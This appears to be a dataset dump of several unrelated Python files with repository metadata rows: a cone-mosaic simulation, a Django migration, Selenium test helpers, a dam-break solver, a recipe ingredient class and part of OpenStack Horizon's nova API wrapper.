plt.imshow(f,interpolation='none')
#plt.colorbar()
plt.autoscale(False)
x = self.xidx(self.cones_x[n])
y = self.yidx(self.cones_y[n])
plt.plot(x,y,'ks')
def display_full_field(self,N=64):
f,n = r.compute_full_field(N)
f = np.reshape(f,(N,N))
plt.imshow(f,interpolation='none')
plt.colorbar()
def plot(self,zoom=1.0):
plt.plot(self.cones_x,self.cones_y,'k.')
x1 = self.xmid-self.dx/2.0*np.sqrt(2)/zoom
x2 = self.xmid+self.dx/2.0*np.sqrt(2)/zoom
y1 = self.ymid-self.dy/2.0*np.sqrt(2)/zoom
y2 = self.ymid+self.dy/2.0*np.sqrt(2)/zoom
plt.xlim((x1,x2))
plt.ylim((y1,y2))
def f2cdf(self,f):
# convert a field into a CDF such that the
# lowest points in the field have the highest
# chance of being selected
if not np.min(f)==np.max(f):
weights = np.max(f)-f
else:
weights = np.ones(f.shape)
csum = np.cumsum(weights)
cdf = csum/np.max(csum)
# search the weights for a random number
test = np.random.rand()
lower_bound = 0
for idx,p in enumerate(cdf):
if test>=lower_bound and test<=p:
winner = idx
break
lower_bound = p
return winner
def step(self):
self.record()
self.save_mosaic()
self.age = self.age + 1
idx_vec = range(self.N_cones)
shuffle(idx_vec)
oldxs = []
oldys = []
newxs = []
newys = []
contrasts = []
neighbor_counts = []
n_expected = 0.0
for idx in idx_vec:
#print '\t%d'%idx
x,y = self.cones_x[idx],self.cones_y[idx]
f,n,XX,YY = self.compute_field(x,y)
neighbor_counts.append(len(n))
#print f
#f = f + np.sqrt(f)*np.random.randn(len(f))*.1
fmin = np.min(f)
fmax = np.max(f)
contrasts.append((fmax-fmin)/fmax)
if self.use_cdf:
winner = self.f2cdf(f)
else:
winner = np.argmin(f)
oldxs.append(self.cones_x[idx])
oldys.append(self.cones_y[idx])
self.cones_x[idx] = XX[winner]
self.cones_y[idx] = YY[winner]
newxs.append(self.cones_x[idx])
newys.append(self.cones_y[idx])
xoa = np.array(oldxs)
yoa = np.array(oldys)
xna = np.array(newxs)
yna = np.array(newys)
d = np.sqrt((xna-xoa)**2+(yna-yoa)**2)
self.shift_mean = d.mean()
self.shift_std = d.std()
self.shift_max = d.max()
self.shift_min = d.min()
self.N_neighbors = np.mean(neighbor_counts)
print 'Mean shift: %0.6f, N_neighbors: %0.1f'%(self.shift_mean,self.N_neighbors)
G = 10
if self.age%1==0:
plt.clf()
plt.subplot(2,2,1)
plt.cla()
clim = (np.min(self.mosaic),np.max(self.mosaic))
plt.imshow(self.mosaic,cmap='gray',interpolation='none',clim=clim)
plt.colorbar()
plt.subplot(2,2,2)
plt.cla()
self.plot()
for oldx,oldy,newx,newy in zip(oldxs[-G:],oldys[-G:],newxs[-G:],newys[-G:]):
plt.plot([oldx,newx],[oldy,newy],'b-')
plt.plot(newx,newy,'ro')
plt.subplot(2,2,3)
plt.cla()
sy,sx = self.mosaic.shape
my,mx = sy//2,sx//2
plt.imshow(self.mosaic[my-50:my+50,mx-50:mx+50],cmap='gray',interpolation='none',clim=clim)
plt.colorbar()
plt.subplot(2,2,4)
plt.cla()
self.plot(zoom=5.0)
plt.pause(.001)
self.h5.put('/age',self.age)
if __name__=='__main__':
# locality .02 finishes in < 1 min; .01 in 20 minutes; because the resulting granularity
# of .01 leads to far fewer stationary cones each step; locality .02 with granularity .02/16.0
# would be even slower; locality .01 with granularity .0025 would be quite a bit faster
locality = .01
granularity = locality/4.0#originally locality/8.0
# an excellent combination of these parameters is 0.01,5.0,4500
cone_potential_fwhm_vec = [.010]
central_field_strength_vec = [7.5]
use_cdf = False
for cone_potential_fwhm in cone_potential_fwhm_vec:
for central_field_strength in central_field_strength_vec:
#m = Mosaic(x1=-.25,x2=.25,y1=-.25,y2=.25,N_cones=4500,locality=locality,granularity=granularity,central_field_strength=central_field_strength,potential_fwhm_deg=cone_potential_fwhm,use_cdf=use_cdf)
m = Mosaic(x1=-.5,x2=.5,y1=-.5,y2=.5,N_cones=20000,locality=locality,granularity=granularity,central_field_strength=central_field_strength,potential_fwhm_deg=cone_potential_fwhm,use_cdf=use_cdf)
while m.shift_mean>2.5e-4 and m.age<200:
m.step()
| [
"[email protected]"
] | |
17e98671744e907b39b79ee00bceb8d098905ea7 | c0792645c156cb9e20a1aa2b28c565150358bc6e | /apps/inmueble/migrations/0017_auto_20180526_0412.py | 8ddac3048c867751bb7c7635c709ef1ddbd2cc4d | [] | no_license | clioo/Praver | b22fd92886e0399845adb4366663cae6a7d7853b | 523f0d78e0a2039a5bae3e539c93e2c2415a0840 | refs/heads/master | 2020-03-11T12:38:54.272392 | 2018-06-28T18:24:21 | 2018-06-28T18:24:21 | 130,003,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2018-05-26 10:12
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('inmueble', '0016_auto_20180526_0410'),
]
operations = [
migrations.AlterModelOptions(
name='localidades',
options={'managed': False},
),
]
| [
"[email protected]"
] | |
823e85e0dfe556e154f26652a500ed91838d9a13 | 8fa8ded3772dd7a124c1bbb91fc109ed2b63574b | /mycelium/apps/volunteers/tests/selenium_abstractions.py | 5cda3d87e310f4732fb2b14444382ce6e7a8d3c9 | [] | no_license | skoczen/mycelium | 3642b0f5e5ea03d609a3e499c7ad68092101dce0 | da0f169163f4dc93e2dc2b0d934abf4f18c18af0 | refs/heads/master | 2020-04-10T09:21:46.893254 | 2014-05-20T02:27:06 | 2014-05-20T02:27:06 | 2,114,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,479 | py | import time
from test_factory import Factory
class VolunteerTestAbstractions(object):
def create_new_volunteer(self):
sel = self.selenium
self.create_john_smith_and_verify()
sel.click("css=.detail_tab[href=#volunteer]")
time.sleep(1)
assert sel.is_text_present("No volunteer shifts yet")
def create_new_volunteer_with_one_shift(self):
sel = self.selenium
self.create_new_volunteer()
sel.click("css=.detail_tab[href=#volunteer]")
time.sleep(1)
assert sel.is_text_present("No volunteer shifts yet")
sel.click("css=tabbed_box[name=add_a_volunteer_shift] tab_title")
sel.type("css=#id_duration", 4)
sel.type("css=#id_date", "2/11/2011")
sel.click("css=tabbed_box[name=add_a_volunteer_shift] .add_shift_btn")
time.sleep(1)
self.assertEqual("4 hours", sel.get_text("css=.volunteer_shift_table:nth(0) .completed_volunteer_shift_row .duration"))
self.assertEqual("Feb. 11, 2011", sel.get_text("css=.volunteer_shift_table:nth(0) .completed_volunteer_shift_row .date"))
# self.assertEqual("on an unscheduled shift.", sel.get_text("css=.volunteer_shift_table:nth(0) .completed_volunteer_shift_row .shift"))
self.assertEqual("2011", sel.get_text("css=.year_overview:nth(0) .year"))
self.assertEqual("1 shift", sel.get_text("css=.year_overview:nth(0) .total_shifts"))
self.assertEqual("4 hours", sel.get_text("css=.year_overview:nth(0) .total_hours"))
sel.click("link=See details")
self.assertEqual("4 hours", sel.get_text("css=.year_of_shifts:nth(0) .year_of_volunteer_shifts_table .completed_volunteer_shift_row .duration"))
self.assertEqual("Feb. 11, 2011", sel.get_text("css=.year_of_shifts:nth(0) .year_of_volunteer_shifts_table .completed_volunteer_shift_row .date"))
# self.assertEqual("on an unscheduled shift.", sel.get_text("css=.year_of_shifts:nth(0) .year_of_volunteer_shifts_table .completed_volunteer_shift_row .shift"))
def add_a_new_shift(self, hours=None, date=None):
sel = self.selenium
if not hours:
hours = Factory.rand_int(1,10)
sel.click("css=tabbed_box[name=add_a_volunteer_shift] tab_title")
sel.type("css=#id_duration", hours)
if date:
sel.type("css=#id_date", date)
sel.click("css=tabbed_box[name=add_a_volunteer_shift] .add_shift_btn")
time.sleep(2) | [
"[email protected]"
] | |
f19711c824d08b2f99bde202875be60d5015bc4a | dfc827bf144be6edf735a8b59b000d8216e4bb00 | /CODE/experimentcode/DryBedPaper/Dambreak/FEVMdryWBuhonly zeroorder/Run.py | 12accac582bfd8b9937706f72632e59e0bb7acdc | [] | no_license | jordanpitt3141/ALL | c5f55e2642d4c18b63b4226ddf7c8ca492c8163c | 3f35c9d8e422e9088fe096a267efda2031ba0123 | refs/heads/master | 2020-07-12T16:26:59.684440 | 2019-05-08T04:12:26 | 2019-05-08T04:12:26 | 94,275,573 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,430 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 14:24:26 2017
@author: jp
"""
from Serre2dc import *
from scipy import *
from pylab import plot, show, legend,xlim,ylim,savefig,title,xlabel,ylabel,clf, loglog
import csv
import os
from numpy.linalg import norm,solve
from time import time
def copyarraytoC(a):
n = len(a)
b = mallocPy(n)
for i in range(n):
writetomem(b,i,a[i])
return b
def copyarrayfromC(a,n):
b = [0]*n
for i in range(n):
b[i] = readfrommem(a,i)
return b
def copywritearraytoC(a,b):
n = len(a)
for i in range(n):
writetomem(b,i,a[i])
def makevar(sx,ex,dx,st,et,dt):
x = arange(sx, ex, dx)
t = arange(st, et, dt)
return x,t
def getGfromupy(h,u,bed,u0,u1,h0,h1,b0,b1,dx):
idx = 1.0 / dx
ithree = 1.0 / 3.0
n = len(h)
G = zeros(n)
for i in range(1,n-1):
th = h[i]
thx = 0.5*idx*(h[i+1] - h[i-1])
tbx = 0.5*idx*(bed[i+1] - bed[i-1])
tbxx = idx*idx*(bed[i+1] -2*bed[i] + bed[i-1])
D = th + th*thx*tbx + 0.5*th*th*tbxx + th*tbx*tbx
ai = -ithree*idx*idx*th*th*th + 0.5*idx*th*th*thx
bi = D + 2.0*ithree*idx*idx*th*th*th
ci = -ithree*idx*idx*th*th*th - 0.5*idx*th*th*thx
G[i] = ai*u[i-1] + bi*u[i] + ci*u[i+1]
#boundary
#i=0
i=0
th = h[i]
thx = 0.5*idx*(h[i+1] - h0)
tbx = 0.5*idx*(bed[i+1] - b0)
tbxx = idx*idx*(bed[i+1] -2*bed[i] + b0)
D = th + th*thx*tbx + 0.5*th*th*tbxx + th*tbx*tbx
ai = -ithree*idx*idx*th*th*th + 0.5*idx*th*th*thx
bi = D + 2.0*ithree*idx*idx*th*th*th
ci = -ithree*idx*idx*th*th*th - 0.5*idx*th*th*thx
G[i] = ai*u0 + bi*u[i] + ci*u[i+1]
#i = n-1
i = n-1
th = h[i]
thx = 0.5*idx*(h1 - h[i-1])
tbx = 0.5*idx*(b1 - bed[i-1])
tbxx = idx*idx*(b1 -2*bed[i] + bed[i-1])
D = th + th*thx*tbx + 0.5*th*th*tbxx + th*tbx*tbx
ai = -ithree*idx*idx*th*th*th + 0.5*idx*th*th*thx
bi = D + 2.0*ithree*idx*idx*th*th*th
ci = -ithree*idx*idx*th*th*th - 0.5*idx*th*th*thx
G[i] = ai*u[i-1] + bi*u[i] + ci*u1
return G
def Dambreak(h0,h1,x0,x):
n = len(x)
h = zeros(n)
u = zeros(n)
G = zeros(n)
b = zeros(n)
for i in range(n):
if (x[i] < x0):
h[i] = h1
else:
h[i] = h0
return h,u,G,b,h
def DrybedSWWANA(h1,x,t,g):
n = len(x)
u = zeros(n)
h = zeros(n)
G = zeros(n)
for i in range(n):
if(x[i] >= -t*sqrt(g*h1) and x[i] <= 2*t*sqrt(g*h1) ):
u[i] = 2.0 / 3.0 *(sqrt(g*h1) + x[i] / t)
h[i] = 4.0 / (9.0 * g) *(sqrt(g*h1) - 0.5*x[i] / t)**2
ux = 2.0 / 3.0 *(1.0 / t)
uxx = 0
hx = 2.0 / (9.0 * g * t*t) *(x[i] - 2*t*sqrt(g*h1))
G[i] = u[i]*h[i] - h[i]*h[i]*hx*ux
elif(x[i] < -t*sqrt(g*h1)):
h[i] = h1
return h,u, G
#Forcing Problem
wdir = "/home/jp/Documents/PhD/project/data/DryBedPaper/Dambreak/t1/"
if not os.path.exists(wdir):
os.makedirs(wdir)
g = 9.81
h1 = 1.0
h0 = 0.0
x0 = 0
startx = -100
sx = startx
endx = 100
ex = endx
startt = 0.0
st = startt
endt = 10
et = endt
dx = 0.01
l = 0.01
dt = l*dx
t = startt
x = arange(startx,endx +0.1*dx, dx)
xhuMbeg = array([x[0] - 1.5*dx, x[0] - dx, x[0] -0.5*dx])
xhuMend = array([x[-1] + 0.5*dx, x[-1] + dx, x[-1] + 1.5*dx])
xbMbeg = [x[0] - (2 + 0.5)*dx,x[0] - (2 + 1.0/6.0)*dx,x[0] - (2 - 1.0/6.0)*dx,x[0] - (2 - 0.5)*dx,x[0] - (1 + 1.0/6.0)*dx,x[0] - (1 - 1.0/6.0)*dx,x[0] - (1 - 0.5)*dx]
xbMend = [x[-1] + (1 - 0.5)*dx,x[-1] + (1 - 1.0/6.0)*dx,x[-1] + (1 + 1.0/6.0)*dx,x[-1] + (1 + 0.5)*dx,x[-1] + (2 - 1.0/6.0)*dx,x[-1] + (2 + 1.0/6.0)*dx,x[-1] + (2 + 0.5)*dx]
theta = 1.2
h,u,G,b,w = Dambreak(h0,h1,x0,x)
hMbeg,uMbeg,GMbeg,bta,wMbeg = Dambreak(h0,h1,x0,xhuMbeg)
hMend ,uMend ,GMend ,bta,wMend = Dambreak(h0,h1,x0,xhuMend)
hta,uta,Gta,bMbeg,wta = Dambreak(h0,h1,x0,xbMbeg)
hta,uta,Gta,bMend,wta = Dambreak(h0,h1,x0,xbMbeg)
n = len(x)
hnBC = 3
hnbc = 3*n + 2*hnBC
bnMBC = 7
bnBC = 4
bnbc = 3*n + 1 + 2*(bnBC -1)
unBC = 3
unbc = 2*n + 1 + 2*(unBC -1)
niBC = 4
xbegC = arange(sx - niBC*dx,sx,dx)
xendC = arange(ex + dx,ex + (niBC+1)*dx,dx)
b0C = b[0]*ones(niBC)
b1C = b[-1]*ones(niBC)
u0C = u[0]*ones(niBC)
u1C = u[-1]*ones(niBC)
h0C = h[0]*ones(niBC)
h1C = h[-1]*ones(niBC)
G0C = G[0]*ones(niBC)
G1C = G[-1]*ones(niBC)
xbcC = concatenate([xbegC,x,xendC])
bbcC = concatenate([b0C,b,b1C])
hbcC = concatenate([h0C,h,h1C])
ubcC = concatenate([u0C,u,u1C])
GbcC = concatenate([G0C,G,G1C])
xbcC_c = copyarraytoC(xbcC)
bbcC_c = copyarraytoC(bbcC)
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
Eni = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pni = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mni = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gni = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
h_c = copyarraytoC(h)
G_c = copyarraytoC(G)
x_c = copyarraytoC(x)
b_c = copyarraytoC(b)
u_c = mallocPy(n)
hMbeg_c = copyarraytoC(hMbeg)
hMend_c = copyarraytoC(hMend)
wMbeg_c = copyarraytoC(wMbeg)
wMend_c = copyarraytoC(wMend)
bMbeg_c = copyarraytoC(bMbeg)
bMend_c = copyarraytoC(bMend)
GMbeg_c = copyarraytoC(GMbeg)
GMend_c = copyarraytoC(GMend)
uMbeg_c = copyarraytoC(uMbeg)
uMend_c = copyarraytoC(uMend)
ubc_c = mallocPy(unbc)
hbc_c = mallocPy(hnbc)
wbc_c = mallocPy(hnbc)
Gbc_c = mallocPy(hnbc)
bbc_c = mallocPy(bnbc)
t = 0.0
#Just an FEM solve here
while t < endt:
evolvewrapForcingANA(h_c,G_c,b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,uMbeg_c,uMend_c,n,hnBC,hnbc,bnBC,bnMBC,bnbc,unBC,unbc,theta,dx,dt,g);
t = t + dt
print(t)
hSWWE,uSWWE,GSWWE = DrybedSWWANA(h1,x,t,g)
hC = copyarrayfromC(h_c,n)
GC = copyarrayfromC(G_c,n)
ReconandSolve(h_c,G_c,b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,uMbeg_c,uMend_c,n,hnBC,hnbc,bnBC,bnMBC,bnbc,unBC,unbc,theta,dx,dt,g,Gbc_c,hbc_c,wbc_c,ubc_c,bbc_c)
ubcC = copyarrayfromC(ubc_c,unbc)
uC = ubcC[unBC:-unBC:2]
hbcC = copyarrayfromC(hbc_c,hnbc)
wbcC = copyarrayfromC(wbc_c,hnbc)
GbcC = copyarrayfromC(Gbc_c,hnbc)
bbcC = copyarrayfromC(bbc_c,bnbc)
u0Cn = uC[0]*ones(niBC)
u1Cn = uC[-1]*ones(niBC)
h0Cn = hC[0]*ones(niBC)
h1Cn = hC[-1]*ones(niBC)
G0Cn = GC[0]*ones(niBC)
G1Cn = GC[-1]*ones(niBC)
hbcC = concatenate([h0Cn,hC,h1Cn])
ubcC = concatenate([u0Cn,uC,u1Cn])
GbcC = concatenate([G0Cn,GC,G1Cn])
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
En = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pn = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mn = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gn = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
Eerr = abs(En- Eni)/ abs(Eni)
Perr = abs(Pn- Pni)
Gerr = abs(Gn- Gni)
Merr = abs(Mn- Mni)/ abs(Mni)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
deallocPy(h_c)
deallocPy(G_c)
deallocPy(u_c)
deallocPy(ubc_c)
deallocPy(hbc_c)
deallocPy(wbc_c)
deallocPy(Gbc_c)
deallocPy(bbc_c)
deallocPy(hMbeg_c)
deallocPy(GMbeg_c)
deallocPy(uMbeg_c)
deallocPy(hMend_c)
deallocPy(GMend_c)
deallocPy(uMend_c)
deallocPy(wMbeg_c)
deallocPy(wMend_c)
| [
"[email protected]"
] | |
3514ec92ed02abcbee5fee7ae8ee2db6b9582ad4 | a087b6fbd9bc4f3ec1d7f48268e733e106369fcd | /food_project/recipe/ingredient.py | 7e888e99153f0a4be95aaba923d7f84a712d1aff | [] | no_license | zhakguder/FoodProject | 8b628583fb2f0ee3537f5340301b78c926401968 | 7ab881d9884d366efffa7a4c84c27c02fbe7a467 | refs/heads/main | 2023-03-05T18:30:16.939582 | 2021-02-14T19:50:04 | 2021-02-14T19:50:04 | 327,974,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,746 | py | #!/usr/bin/env python3
class Ingredient:
def __init__(self, name, id, quantity, entropy):
self.name = name
self.id = id # column number in recipe ingredients dataframe
self.quantity = quantity
self.entropy = entropy
# clusters = {}
ingredients_to_clusters = {} # TODO: put this into mongo
# TODO: separate populating this into an independent task, do it upfront once
# not with every run of the program
class IngredientCluster:
def __init__(self, name, *ingredients):
self.name = name
self.ingredients = ingredients
# self.quantity = 0
# clusters[name] = self
self.save_ingredients() # TODO: functions shouldn't have side-effects!!!
def save_ingredients(self):
# TODO: not written well
for ingredient in self.ingredients:
ingredients_to_clusters[ingredient.name] = self.name
def add_ingredient(self, ingredient):
self.ingredients += (ingredient,)
def get_quantity(self):
# self.quantity = sum([x.quantity for x in self.ingredients])
# return self.quantity
return sum([x.quantity for x in self.ingredients])
def get_entropy(self):
# self.entropy = sum([x.entropy for x in self.ingredients])
# return self.entropy
try:
n_ingredients = len([x for x in self.ingredients if x.entropy != 0])
return sum([x.entropy for x in self.ingredients]) / n_ingredients
except:
return 0
@staticmethod
def ingredient_in_cluster(ing_name):
# return [
# cluster.name for _, cluster in clusters if ing_name in cluster.ingredients
# ]
return ingredients_to_clusters.get(ing_name, None)
| [
"[email protected]"
] | |
4051013cb749e4537f1d7905343871778e1be479 | 14ed72a44d78f748d03df772c4449a5620ae2e85 | /openstack_dashboard/api/nova.py | 07688692eb223e3a73f7fa073aea0098e26c1304 | [] | no_license | duihuhu/mydashboard | 91a98b240da320f65a5324c78d099760057eb429 | 670f5f2fc7ceb7f0f2770b2f7f6f1c9173e0a8c6 | refs/heads/master | 2021-01-19T03:02:18.128402 | 2016-07-25T09:06:01 | 2016-07-25T09:06:01 | 64,120,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,337 | py | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 OpenStack Foundation
# Copyright 2012 Nebula, Inc.
# Copyright (c) 2012 X.commerce, a business unit of eBay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import logging
from django.conf import settings
from django.utils.functional import cached_property # noqa
from django.utils.translation import ugettext_lazy as _
import six
from novaclient import client as nova_client
from novaclient import exceptions as nova_exceptions
from novaclient.v2.contrib import instance_action as nova_instance_action
from novaclient.v2.contrib import list_extensions as nova_list_extensions
from novaclient.v2 import security_group_rules as nova_rules
from novaclient.v2 import security_groups as nova_security_groups
from novaclient.v2 import servers as nova_servers
from horizon import conf
from horizon import exceptions as horizon_exceptions
from horizon.utils import functions as utils
from horizon.utils.memoized import memoized # noqa
from openstack_dashboard.api import base
from openstack_dashboard.api import network_base
LOG = logging.getLogger(__name__)
# Supported compute versions
VERSIONS = base.APIVersionManager("compute", preferred_version=2)
VERSIONS.load_supported_version(1.1, {"client": nova_client, "version": 1.1})
VERSIONS.load_supported_version(2, {"client": nova_client, "version": 2})
# API static values
INSTANCE_ACTIVE_STATE = 'ACTIVE'
VOLUME_STATE_AVAILABLE = "available"
DEFAULT_QUOTA_NAME = 'default'
class VNCConsole(base.APIDictWrapper):
"""Wrapper for the "console" dictionary.
Returned by the novaclient.servers.get_vnc_console method.
"""
_attrs = ['url', 'type']
class SPICEConsole(base.APIDictWrapper):
"""Wrapper for the "console" dictionary.
Returned by the novaclient.servers.get_spice_console method.
"""
_attrs = ['url', 'type']
class RDPConsole(base.APIDictWrapper):
"""Wrapper for the "console" dictionary.
Returned by the novaclient.servers.get_rdp_console method.
"""
_attrs = ['url', 'type']
class SerialConsole(base.APIDictWrapper):
"""Wrapper for the "console" dictionary.
Returned by the novaclient.servers.get_serial_console method.
"""
_attrs = ['url', 'type']
class Server(base.APIResourceWrapper):
"""Simple wrapper around novaclient.server.Server.
Preserves the request info so image name can later be retrieved.
"""
_attrs = ['addresses', 'attrs', 'id', 'image', 'links',
'metadata', 'name', 'private_ip', 'public_ip', 'status', 'uuid',
'image_name', 'VirtualInterfaces', 'flavor', 'key_name', 'fault',
'tenant_id', 'user_id', 'created', 'OS-EXT-STS:power_state',
'OS-EXT-STS:task_state', 'OS-EXT-SRV-ATTR:instance_name',
'OS-EXT-SRV-ATTR:host', 'OS-EXT-AZ:availability_zone',
'OS-DCF:diskConfig']
def __init__(self, apiresource, request):
super(Server, self).__init__(apiresource)
self.request = request
# TODO(gabriel): deprecate making a call to Glance as a fallback.
@property
def image_name(self):
import glanceclient.exc as glance_exceptions # noqa
from openstack_dashboard.api import glance # noqa
if not self.image:
return _("-")
if hasattr(self.image, 'name'):
return self.image.name
if 'name' in self.image:
return self.image['name']
else:
try:
image = glance.image_get(self.request, self.image['id'])
return image.name
except (glance_exceptions.ClientException,
horizon_exceptions.ServiceCatalogException):
return _("-")
@property
def internal_name(self):
return getattr(self, 'OS-EXT-SRV-ATTR:instance_name', "")
@property
def availability_zone(self):
return getattr(self, 'OS-EXT-AZ:availability_zone', "")
@property
def host_server(self):
return getattr(self, 'OS-EXT-SRV-ATTR:host', '')
class Hypervisor(base.APIDictWrapper):
"""Simple wrapper around novaclient.hypervisors.Hypervisor."""
_attrs = ['manager', '_loaded', '_info', 'hypervisor_hostname', 'id',
'servers']
@property
def servers(self):
# if hypervisor doesn't have servers, the attribute is not present
servers = []
try:
servers = self._apidict.servers
except Exception:
pass
return servers
class NovaUsage(base.APIResourceWrapper):
"""Simple wrapper around contrib/simple_usage.py."""
_attrs = ['start', 'server_usages', 'stop', 'tenant_id',
'total_local_gb_usage', 'total_memory_mb_usage',
'total_vcpus_usage', 'total_hours']
def get_summary(self):
return {'instances': self.total_active_instances,
'memory_mb': self.memory_mb,
'vcpus': self.vcpus,
'vcpu_hours': self.vcpu_hours,
'local_gb': self.local_gb,
'disk_gb_hours': self.disk_gb_hours,
'memory_mb_hours': self.memory_mb_hours}
@property
def total_active_instances(self):
return sum(1 for s in self.server_usages if s['ended_at'] is None)
@property
def vcpus(self):
return sum(s['vcpus'] for s in self.server_usages
if s['ended_at'] is None)
@property
def vcpu_hours(self):
return getattr(self, "total_vcpus_usage", 0)
@property
def local_gb(self):
return sum(s['local_gb'] for s in self.server_usages
if s['ended_at'] is None)
@property
def memory_mb(self):
return sum(s['memory_mb'] for s in self.server_usages
if s['ended_at'] is None)
@property
def disk_gb_hours(self):
return getattr(self, "total_local_gb_usage", 0)
@property
def memory_mb_hours(self):
return getattr(self, "total_memory_mb_usage", 0)
class SecurityGroup(base.APIResourceWrapper):
"""Wrapper around novaclient.security_groups.SecurityGroup.
Wraps its rules in SecurityGroupRule objects and allows access to them.
"""
_attrs = ['id', 'name', 'description', 'tenant_id']
@cached_property
def rules(self):
"""Wraps transmitted rule info in the novaclient rule class."""
manager = nova_rules.SecurityGroupRuleManager(None)
rule_objs = [nova_rules.SecurityGroupRule(manager, rule)
for rule in self._apiresource.rules]
return [SecurityGroupRule(rule) for rule in rule_objs]
def to_dict(self):
return self._apiresource.to_dict()
@six.python_2_unicode_compatible
class SecurityGroupRule(base.APIResourceWrapper):
"""Wrapper for individual rules in a SecurityGroup."""
_attrs = ['id', 'ip_protocol', 'from_port', 'to_port', 'ip_range', 'group']
def __str__(self):
if 'name' in self.group:
vals = {'from': self.from_port,
'to': self.to_port,
'ip_protocol': self.ip_protocol,
'group': self.group['name']}
return (_('ALLOW %(from)s:%(to)s/%(ip_protocol)s from %(group)s') %
vals)
else:
vals = {'from': self.from_port,
'to': self.to_port,
'ip_protocol': self.ip_protocol,
'cidr': self.ip_range['cidr']}
return (_('ALLOW %(from)s:%(to)s/%(ip_protocol)s from %(cidr)s') %
vals)
# The following attributes are defined to keep compatibility with Neutron
@property
def ethertype(self):
return None
@property
def direction(self):
return 'ingress'
class SecurityGroupManager(network_base.SecurityGroupManager):
backend = 'nova'
def __init__(self, request):
self.request = request
self.client = novaclient(request)
def list(self):
return [SecurityGroup(g) for g
in self.client.security_groups.list()]
def get(self, sg_id):
return SecurityGroup(self.client.security_groups.get(sg_id))
def create(self, name, desc):
return SecurityGroup(self.client.security_groups.create(name, desc))
def update(self, sg_id, name, desc):
return SecurityGroup(self.client.security_groups.update(sg_id,
name, desc))
def delete(self, security_group_id):
self.client.security_groups.delete(security_group_id)
def rule_create(self, parent_group_id,
direction=None, ethertype=None,
ip_protocol=None, from_port=None, to_port=None,
cidr=None, group_id=None):
# Nova Security Group API does not use direction and ethertype fields.
try:
sg = self.client.security_group_rules.create(parent_group_id,
ip_protocol,
from_port,
to_port,
cidr,
group_id)
except nova_exceptions.BadRequest:
raise horizon_exceptions.Conflict(
_('Security group rule already exists.'))
return SecurityGroupRule(sg)
def rule_delete(self, security_group_rule_id):
self.client.security_group_rules.delete(security_group_rule_id)
def list_by_instance(self, instance_id):
"""Gets security groups of an instance."""
# TODO(gabriel): This needs to be moved up to novaclient, and should
# be removed once novaclient supports this call.
security_groups = []
nclient = self.client
resp, body = nclient.client.get('/servers/%s/os-security-groups'
% instance_id)
if body:
# Wrap data in SG objects as novaclient would.
sg_objs = [
nova_security_groups.SecurityGroup(
nclient.security_groups, sg, loaded=True)
for sg in body.get('security_groups', [])]
# Then wrap novaclient's object with our own. Yes, sadly wrapping
# with two layers of objects is necessary.
security_groups = [SecurityGroup(sg) for sg in sg_objs]
return security_groups
def update_instance_security_group(self, instance_id,
new_security_group_ids):
try:
all_groups = self.list()
except Exception:
raise Exception(_("Couldn't get security group list."))
wanted_groups = set([sg.name for sg in all_groups
if sg.id in new_security_group_ids])
try:
current_groups = self.list_by_instance(instance_id)
except Exception:
raise Exception(_("Couldn't get current security group "
"list for instance %s.")
% instance_id)
current_group_names = set([sg.name for sg in current_groups])
groups_to_add = wanted_groups - current_group_names
groups_to_remove = current_group_names - wanted_groups
num_groups_to_modify = len(groups_to_add | groups_to_remove)
try:
for group in groups_to_add:
self.client.servers.add_security_group(instance_id, group)
num_groups_to_modify -= 1
for group in groups_to_remove:
self.client.servers.remove_security_group(instance_id, group)
num_groups_to_modify -= 1
except nova_exceptions.ClientException as err:
LOG.error(_("Failed to modify %(num_groups_to_modify)d instance "
"security groups: %(err)s") %
dict(num_groups_to_modify=num_groups_to_modify,
err=err))
# reraise novaclient.exceptions.ClientException, but with
# a sanitized error message so we don't risk exposing
# sensitive information to the end user. This has to be
# novaclient.exceptions.ClientException, not just
# Exception, since the former is recognized as a
# "recoverable" exception by horizon, and therefore the
# error message is passed along to the end user, while
# Exception is swallowed alive by horizon and a generic
# error message is given to the end user
raise nova_exceptions.ClientException(
err.code,
_("Failed to modify %d instance security groups") %
num_groups_to_modify)
return True
class FlavorExtraSpec(object):
def __init__(self, flavor_id, key, val):
self.flavor_id = flavor_id
